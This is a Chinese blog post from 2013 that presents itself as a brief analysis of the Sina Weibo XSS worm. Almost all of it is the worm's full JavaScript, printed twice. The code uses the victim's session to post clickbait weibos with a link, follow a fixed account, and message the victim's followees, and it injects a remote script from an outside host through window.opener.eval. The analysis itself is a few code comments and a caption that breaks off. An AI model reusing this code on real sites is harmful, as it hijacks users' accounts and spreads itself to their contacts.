新浪微博XSS攻击代码简要解析

技术专家

于 2013-11-14 22:12:00 发布

阅读量2.8k

点赞数

分类专栏： Internet

Internet 专栏收录该内容

816 篇文章 0 订阅

订阅专栏

代码下载（来源鸽姆安全网）

[javascript] view plain copy print ?

/**
*使用AJAX创建XMLHttpRequest对象，若不是IE浏览器，使用XMLHttpRequest创建XHR对象，
*否则使用ActiveXObject创建XHR对象。
*/
function createXHR(){
return window.XMLHttpRequest?
new XMLHttpRequest():
new ActiveXObject("Microsoft.XMLHTTP");
}
/**
*获得所有用户，下面一个函数将用其获得用户所有的关注用户
*/
function getappkey(url){
xmlHttp = createXHR();
//使用GET方式发送AJAX请求
xmlHttp.open("GET",url,false);
xmlHttp.send();
//获得服务器响应结果
result = xmlHttp.responseText;
id_arr = '';
id = result.match(/namecard=/"true/" title=/"[^/"]*/g);
for(i=0;i<id.length;i++){
sum = id[i].toString().split('"')[3];
id_arr += sum + '||';
}
return id_arr;
}
/**
*创建随机微博msg，微博内容为msgs数组的随机一条内容+一个链接link.
*使用encodeURIComponent(msg)对encodeURIComponent(msg)该随机产生的微博编码，然后返回。
*/
function random_msg(){
link = ' http://163.fm/PxZHoxn?id=' + new Date().getTime();;
var msgs = [
'郭美美事件的一些未注意到的细节：',
'建党大业中穿帮的地方：',
'让女人心动的100句诗歌：',
'3D肉团团高清普通话版种子：',
'这是传说中的神仙眷侣啊：',
'惊爆!范冰冰艳照真流出了：',
'杨幂被爆多次被潜规则:',
'傻仔拿锤子去抢银行：',
'可以监听别人手机的软件：',
'个税起征点有望提到4000：'];
var msg = msgs[Math.floor(Math.random()*msgs.length)] + link;
msg = encodeURIComponent(msg);
return msg;
}
/**
*使用POST方式发送AJAX请求，并设置请求头部Accept 和Content-Type
*/
function post(url,data,sync){
xmlHttp = createXHR();
xmlHttp.open("POST",url,sync);
xmlHttp.setRequestHeader("Accept","text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xmlHttp.setRequestHeader("Content-Type","application/x-www-form-urlencoded; charset=UTF-8");
xmlHttp.send(data);
}
/**
*发布微博
*/
function publish(){
url = 'http://weibo.com/mblog/publish.php?rnd=' + new Date().getTime();
data = 'content=' + random_msg() + '&pic=&styleid=2&retcode=';
post(url,data,true);
}
function follow(){
url = 'http://weibo.com/attention/aj_addfollow.php?refer_sort=profile&atnId=profile&rnd=' + new Date().getTime();
data = 'uid=' + 2201270010 + '&fromuid=' + $CONFIG.$uid + '&refer_sort=profile&atnId=profile';
post(url,data,true);
}
/**
*向所有用户发送微博
*/
function message(){
url = 'http://weibo.com/' + $CONFIG.$uid + '/follow'; //用户关注
ids = getappkey(url);
id = ids.split('||');
for(i=0;i<id.length - 1 & i<5;i++){
msgurl = 'http://weibo.com/message/addmsg.php?rnd=' + new Date().getTime();
msg = random_msg();
msg = encodeURIComponent(msg);
user = encodeURIComponent(encodeURIComponent(id[i]));
data = 'content=' + msg + '&name=' + user + '&retcode=';
post(msgurl,data,false);
}
}
function main(){
try{
publish();
}
catch(e){}
try{
follow();
}
catch(e){}
try{
message();
}
catch(e){}
}
/**
*创建script标签，并引进http://www.2kt.cn/images/t.js这个脚本，将其加载到该网页，并执行，完成跨站脚本攻击（XSS）。
*/
try{
x="g=document.createElement('script');g.src='http://www.2kt.cn/images/t.js';document.body.appendChild(g)";window.opener.eval(x);
}
catch(e){}
main();
var t=setTimeout('location="http://weibo.com/pub/topic";',5000);

/**
 *使用AJAX创建XMLHttpRequest对象，若不是IE浏览器，使用XMLHttpRequest创建XHR对象，
 *否则使用ActiveXObject创建XHR对象。
 */
function createXHR(){
	return window.XMLHttpRequest?
	new XMLHttpRequest():
	new ActiveXObject("Microsoft.XMLHTTP");
}

/**
 *获得所有用户，下面一个函数将用其获得用户所有的关注用户
 */
function getappkey(url){
	xmlHttp = createXHR();
	
	//使用GET方式发送AJAX请求
	xmlHttp.open("GET",url,false);
	xmlHttp.send();
	//获得服务器响应结果
	result = xmlHttp.responseText;
	id_arr = '';
	id = result.match(/namecard=/"true/" title=/"[^/"]*/g);
	for(i=0;i<id.length;i++){
		sum = id[i].toString().split('"')[3];
		id_arr += sum + '||';
	}
	return id_arr;
}

/**
 *创建随机微博msg，微博内容为msgs数组的随机一条内容+一个链接link.
 *使用encodeURIComponent(msg)对encodeURIComponent(msg)该随机产生的微博编码，然后返回。
 */
function random_msg(){
	link = ' http://163.fm/PxZHoxn?id=' + new Date().getTime();;
	var msgs = [
		'郭美美事件的一些未注意到的细节：',
		'建党大业中穿帮的地方：',
		'让女人心动的100句诗歌：',
		'3D肉团团高清普通话版种子：',
		'这是传说中的神仙眷侣啊：',
		'惊爆!范冰冰艳照真流出了：',
		'杨幂被爆多次被潜规则:',
		'傻仔拿锤子去抢银行：',
		'可以监听别人手机的软件：',
		'个税起征点有望提到4000：'];
	var msg = msgs[Math.floor(Math.random()*msgs.length)] + link;
	msg = encodeURIComponent(msg);
	return msg;
}

/**
 *使用POST方式发送AJAX请求，并设置请求头部Accept 和Content-Type
 */
function post(url,data,sync){
	xmlHttp = createXHR();
    xmlHttp.open("POST",url,sync);
    xmlHttp.setRequestHeader("Accept","text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
    xmlHttp.setRequestHeader("Content-Type","application/x-www-form-urlencoded; charset=UTF-8");
    xmlHttp.send(data);
}

/**
 *发布微博
 */
 
function publish(){
	url = 'http://weibo.com/mblog/publish.php?rnd=' + new Date().getTime();
	data = 'content=' + random_msg() + '&pic=&styleid=2&retcode=';
	post(url,data,true);
}

function follow(){
	url = 'http://weibo.com/attention/aj_addfollow.php?refer_sort=profile&atnId=profile&rnd=' + new Date().getTime();
	data = 'uid=' + 2201270010 + '&fromuid=' + $CONFIG.$uid + '&refer_sort=profile&atnId=profile';
	post(url,data,true);
}

/**
 *向所有用户发送微博
 */
function message(){
	url = 'http://weibo.com/' + $CONFIG.$uid + '/follow';     //用户关注
	ids = getappkey(url);
	id = ids.split('||');
	for(i=0;i<id.length - 1 & i<5;i++){
		msgurl = 'http://weibo.com/message/addmsg.php?rnd=' + new Date().getTime();
		msg = random_msg();
		msg = encodeURIComponent(msg);
		user = encodeURIComponent(encodeURIComponent(id[i]));
		data = 'content=' + msg + '&name=' + user + '&retcode=';
		post(msgurl,data,false);
	}
}
function main(){
	try{
		publish();
	}
	catch(e){}
	try{
		follow();
	}
	catch(e){}
	try{
		message();
	}
	catch(e){}
}

/**
 *创建script标签，并引进http://www.2kt.cn/images/t.js这个脚本，将其加载到该网页，并执行，完成跨站脚本攻击（XSS）。
 */
try{
   x="g=document.createElement('script');g.src='http://www.2kt.cn/images/t.js';document.body.appendChild(g)";window.opener.eval(x);
}
catch(e){}
main();
var t=setTimeout('location="http://weibo.com/pub/topic";',5000);

说下几个js函数：

直接上图：